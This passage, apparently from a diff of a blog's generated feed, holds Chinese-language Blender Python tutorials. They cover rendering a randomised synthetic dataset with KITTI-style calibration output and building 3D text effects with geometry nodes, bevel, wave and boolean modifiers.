    # 计算出相机的内参矩阵 K 中的元素,并分别放在 alpha_u、alpha_v、u_0、v_0 和 skew 变量中
    alpha_u = f_in_mm * s_u
    alpha_v = f_in_mm * s_v
    u_0 = resolution_x_in_px * scale / 2
    v_0 = resolution_y_in_px * scale / 2
    skew = 0 # only use rectangular pixels
    # K = Matrix(
    # ((alpha_u, skew, u_0),
    # ( 0 , alpha_v, v_0),
    # ( 0 , 0, 1 )))
    # 将内参矩阵 K 的各个元素和其他参数组成了一个矩阵(实际上只使用了矩阵中的第三行),并存储在名为 calList 的列表中。其中用到了 f-string 来方便地生成字符串。
    calList = [[f'P0: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'P1: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'P2: {alpha_u} {skew} {u_0} 0.0 0.0 {alpha_v} {v_0} 0.0 0.0 0.0 1.0 0.0\n'],
    [f'P3: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'R0_rect: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'Tr_velo_to_cam: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'Tr_imu_to_velo: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n']]
    return calList

    changeTheWorld()

    1
    2
    3
    4
    5
    6
    7
    8
    def changeTheWorld():
    while True:
    # 随机选择一张 hdr 贴图
    wd = random.choice(bpy.data.images)
    if wd.name.endswith('hdr'):
    break
    # 将其设置为环境纹理贴图
    bpy.context.scene.world.node_tree.nodes['Environment Texture'].image = wd

    changeObjs()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def changeObjs():
    # 遍历场景中的所有物体,将它们从当前激活的 collection 中删除,除了名为 "Camera" 的相机
    for obj in bpy.context.collection.objects:
    if obj.name != 'Camera':
    bpy.context.collection.objects.unlink(obj)
    # 定义一个空列表 nameList
    nameList = []
    # 使用 while 循环随机选择场景中的物体,直到选择的数量达到 objsNum(objsNum 是一个变量,需要在函数之外定义),并将其添加到当前激活的 collection 中
    while len(nameList) < objsNum:
    obj = random.choice(bpy.data.objects)
    if not (obj.name in nameList) and obj.name != 'Camera':
    bpy.context.collection.objects.link(obj)
    nameList.append(obj.name)

    bougeLe()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    def bougeLe():
    # 遍历场景中的所有物体,对于除了名为 "Camera" 的相机对象之外的所有对象,将其选中,然后使用 while 循环计算一个比例尺来设置对象的位置
    for obj in bpy.data.objects:
    if obj.name != 'Camera':
    obj.select_set(True)
    # 使用 while 循环是因为在某些情况下,计算比例尺可能会出现异常而导致程序崩溃,因此使用 try 和 excerpt 语句可以让程序不断地重试直到成功为止
    while True:
    try:
    scale = math.sqrt(max(obj.dimensions)) * bpy.data.objects['Camera'].data.lens
    obj.location = (0, 0, -0.08 * scale)
    break
    excerpt:
    continue
    # 随机变换对象的位置、旋转和缩放,并传递一些参数来控制变换的幅度和随机性
    bpy.ops.object.randomize_transform(random_seed = random.randint(0, 100), loc=(0.24, 0.1, 0.05), rot=(3, 3, 3), scale=(1, 1, 1))
    else:
    # 对于名为 "Camera" 的相机对象,使用 random.uniform 方法生成随机的旋转角度,并将其赋值给对象的 Z 轴旋转角度,以模拟相机的扫描动态
    obj.rotation_euler[2] = 4 * random.uniform(-0.7, 0.7)

    snapIt()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    def snapIt(scene, idNum):
    for obj in bpy.data.objects:
    if obj.name != 'Camera':
    # 只选择相机
    obj.select_set(False)
    # 是通过将 imgPath 和 idNum 进行字符串拼接而得到的文件路径和文件名,用于保存渲染图像
    imId = f'{imgPath}{idNum}.png'
    scene.render.filepath = (imId)
    # 调用 bpy.ops.render.render 方法对场景进行渲染,最终将渲染结果保存为一个 PNG 格式的图像文件
    bpy.ops.render.render(write_still=True)
    ]]>
    @@ -6126,7 +6126,7 @@ /posts/Blender-Text%20Effects%20In%20Blender%20(7-12)/ - 资源

    课程

    Add Flickering Effect | Flickering Neon Sign | Simple & Easy Method | Blender Eevee (All Versions)

    1. 打开教程 6 的渲染界面,选中 Camera 对象:

    png

    1. 设置关键帧:

    png

    1. 100 帧后设置关键帧,可以通过移动缩放旋转来改变物体位置,改变的会变成黄色。右键会出现插入关键帧,点击,该物体位置信息就会插入到该关键帧中。

    png

    1. 设置输出文件夹:

    png

    1. 渲染图像:

    png

    1. 此时就输出了 100 帧图像:

    png

    1. Blender 还具有视频编辑功能!

    png

    [3.x] Create Better & Clean 3D Text Using Geometry Nodes In Blender | Easy Step-by-Step Tutorial

    1. 给新工程自带的 Cude 对象不断调整其 Geometry,直到这样:

    png

    import bpy
    import os

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier.node_group

    # 删除 Group Input 节点
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 String to Curves 节点
    string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
    string_to_curves_node.location = (-400, 50)

    string_to_curves_node.align_x = "CENTER"
    string_to_curves_node.align_y = "MIDDLE"
    string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
    string_to_curves_node.inputs[1].default_value = 2.2

    string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (-150, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (50, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (250, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (250, -100)

    # 创建 Join Geometry 节点
    join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
    join_geometry_node.location = (450, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (650, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (850, 50)

    # 获取 output node 节点
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1050, 50)

    # 连接节点
    node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])
    1. 再添加 Bevel

    png

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True
    1. 再添加 Simple Deform

    png

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

    完整代码:

    import bpy
    import os
    import numpy as np

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier_geometrynodes.node_group

    # delete Group Input
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 String to Curves 节点
    string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
    string_to_curves_node.location = (-400, 50)

    string_to_curves_node.align_x = "CENTER"
    string_to_curves_node.align_y = "MIDDLE"
    string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
    string_to_curves_node.inputs[1].default_value = 2.2

    string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (-150, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (50, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (250, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (250, -100)

    # 创建 Join Geometry 节点
    join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
    join_geometry_node.location = (450, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (650, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (850, 50)

    # get output node
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1050, 50)

    # 连接节点
    node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

    [3.x] Create Multi-line Text Using Geometry Nodes In Blender | Easy Step-by-Step Tutorial

    调整之前的 Geometry Node,使其可以多行显示文字:

    png

    import bpy
    import os
    import numpy as np

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier_geometrynodes.node_group

    # delete Group Input
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 Special Characters 节点
    special_characters_node = node_tree.nodes.new(type='FunctionNodeInputSpecialCharacters')
    special_characters_node.location = (-800, 200)

    # 创建 String to Curves 节点
    string_to_curves_nodes = []
    for i in range(2):
    string_to_curves_nodes.append(node_tree.nodes.new(type='GeometryNodeStringToCurves'))
    string_to_curves_nodes[-1].location = (-400, 350 - 400 * i)
    string_to_curves_nodes[-1].align_x = "CENTER"
    string_to_curves_nodes[-1].align_y = "MIDDLE"
    string_to_curves_nodes[-1].inputs[1].default_value = 2.2
    string_to_curves_nodes[0].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))
    string_to_curves_nodes[1].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Ourland.otf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (250, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (450, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (650, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (650, -100)

    # 创建 Join Geometry 节点
    join_geometry_nodes = []
    for i in range(2):
    join_geometry_nodes.append(node_tree.nodes.new(type='GeometryNodeJoinGeometry'))
    join_geometry_nodes[0].location = (50, 50)
    join_geometry_nodes[1].location = (850, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (1050, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (1250, 50)

    # get output node
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1450, 50)

    # 创建 String 节点
    string_nodes = []
    for i in range(3):
    string_nodes.append(node_tree.nodes.new(type='FunctionNodeInputString'))
    string_nodes[-1].location = (-800, -150 * i + 50)
    string_nodes[0].string = 'Taco'
    string_nodes[1].string = 'Tuesday!'
    string_nodes[2].string = 'gigigigigi~'

    # 创建 Join Strings 节点
    join_strings_node = node_tree.nodes.new(type='GeometryNodeStringJoin')
    join_strings_node.location = (-600, 75)

    # 创建 Set Position 节点
    set_position_nodes = []
    for i in range(2):
    set_position_nodes.append(node_tree.nodes.new(type='GeometryNodeSetPosition'))
    set_position_nodes[-1].location = (-150, -250 * i + 200)
    set_position_nodes[0].inputs[3].default_value[1] = 2
    set_position_nodes[1].inputs[3].default_value[1] = -1

    # 连接节点
    node_tree.links.new(special_characters_node.outputs[0], join_strings_node.inputs[0])
    node_tree.links.new(string_nodes[1].outputs[0], join_strings_node.inputs[1])
    node_tree.links.new(string_nodes[0].outputs[0], join_strings_node.inputs[1])
    node_tree.links.new(string_nodes[2].outputs[0], string_to_curves_nodes[1].inputs[0])
    node_tree.links.new(join_strings_node.outputs[0], string_to_curves_nodes[0].inputs[0])
    node_tree.links.new(string_to_curves_nodes[0].outputs[0], set_position_nodes[0].inputs[0])
    node_tree.links.new(string_to_curves_nodes[1].outputs[0], set_position_nodes[1].inputs[0])
    node_tree.links.new(set_position_nodes[0].outputs[0], join_geometry_nodes[0].inputs[0])
    node_tree.links.new(set_position_nodes[1].outputs[0], join_geometry_nodes[0].inputs[0])
    node_tree.links.new(join_geometry_nodes[0].outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_nodes[1].inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_nodes[1].inputs[0])
    node_tree.links.new(join_geometry_nodes[1].outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

    # 创建 Bevel modifier

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True

    # 创建 SimpleDeform modifier,使文本弯曲

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

    Create Wavy or Curvy Text In Blender | Easy Tutorial On Wave Modifier | Dancing Text | Waving Text

    1. 新建一个 Text 对象,调整其文字, BevelAlignment

    png

    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    1. 给它一个 Wave 修改器,调整其参数,就会获得一个波浪动画效果:

    png

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

    完整代码:

    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2
    1. 如果要将它立起来,先转成 Mesh

    png

    text_obj.rotation_euler[0] = np.pi / 2
    1. 删除多余的边:MeshMergeBy distance

    png

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    1. 调整其 RotationObjectApplyAll Transforms

    png

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()
    1. 添加 Wave

    png

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()

    完整代码:

    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

    Easy Method to Engrave Your Text or Logo | How To Carve Any Text | 3D Text Effects In Blender

    1. 新建一个 Text 对象,设置其内容,AlignmentLocation

    png

    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    text_obj.data.extrude = 0.3
    1. 转换为 MESH

    png

    bpy.ops.object.convert(target="MESH")
    1. 按住 X 右键,删除 Limit Dissolve

    png

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

    4.MeshMergeBy Distance

    png

    png

    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.object.editmode_toggle()
    1. 按住 E 网上拖,获得 Extrude

    png

    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()
    1. 新建一个 Cube,设置其 Scale

    png

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]
    1. 设置 Boolean

    png

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()
    1. 设置材质,应用 Boolean

    png

    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)
    1. 应用 Scale

    png

    bpy.ops.object.transform_apply()
    1. 设置 Bevel 及其相关参数:

    png

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True
    1. 导出 .glb 格式,可被 3D Viewer 读取。

    png

    bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './outputs/1')))

    完整代码:

    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    # text_obj.data.extrude = 0.3

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]

    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './outputs/1')))

    Easy Method to Emboss Your Text or Logo | How To Create Raised Letters | 3D Text Effects In Blender

    emmmm 差不多就是把上一个的 Boolean 中的 DIfference 改为 UNION。如果有破,要自己修复:

    png

    ]]>
    + 资源

    课程

    Add Flickering Effect | Flickering Neon Sign | Simple & Easy Method | Blender Eevee (All Versions)

    1. 打开教程 6 的渲染界面,选中 Camera 对象:

    png

    1. 设置关键帧:

    png

    1. 100 帧后设置关键帧,可以通过移动缩放旋转来改变物体位置,改变的会变成黄色。右键会出现插入关键帧,点击,该物体位置信息就会插入到该关键帧中。

    png

    1. 设置输出文件夹:

    png

    1. 渲染图像:

    png

    1. 此时就输出了 100 帧图像:

    png

    1. Blender 还具有视频编辑功能!

    png

    [3.x] Create Better & Clean 3D Text Using Geometry Nodes In Blender | Easy Step-by-Step Tutorial

    1. 给新工程自带的 Cude 对象不断调整其 Geometry,直到这样:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    import bpy
    import os

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier.node_group

    # 删除 Group Input 节点
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 String to Curves 节点
    string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
    string_to_curves_node.location = (-400, 50)

    string_to_curves_node.align_x = "CENTER"
    string_to_curves_node.align_y = "MIDDLE"
    string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
    string_to_curves_node.inputs[1].default_value = 2.2

    string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (-150, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (50, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (250, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (250, -100)

    # 创建 Join Geometry 节点
    join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
    join_geometry_node.location = (450, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (650, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (850, 50)

    # 获取 output node 节点
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1050, 50)

    # 连接节点
    node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])
    1. 再添加 Bevel

    png

    1
    2
    3
    4
    5
    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True
    1. 再添加 Simple Deform

    png

    1
    2
    3
    4
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    import bpy
    import os
    import numpy as np

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
